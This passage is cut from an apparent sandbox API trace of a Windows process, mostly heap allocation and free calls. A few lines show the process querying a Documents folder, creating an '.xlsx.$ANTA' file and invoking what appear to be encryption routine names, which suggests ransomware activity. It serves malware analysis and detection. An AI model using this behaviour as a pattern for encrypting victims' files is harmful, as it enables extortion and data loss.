Flags=0x0, Size=0x4) returned 0x43e2690 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0078.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0078.177] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0078.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.177] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\wfolkwjf.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.179] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.179] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0078.179] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.179] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0078.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0078.183] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0078.184] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x1a9b, lpOverlapped=0x0) returned 1 [0078.184] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0078.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a9b) returned 0x48f0048 [0078.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0078.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a9b) returned 0x48f1af0 [0078.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.188] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0078.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a9b) returned 0x48f0048 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.189] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.189] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0078.189] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0078.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a9b) returned 0x48f0048 [0078.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a9b) returned 0x48f3598 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.191] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0078.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0078.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0078.191] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.192] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0078.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.193] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.193] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.194] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 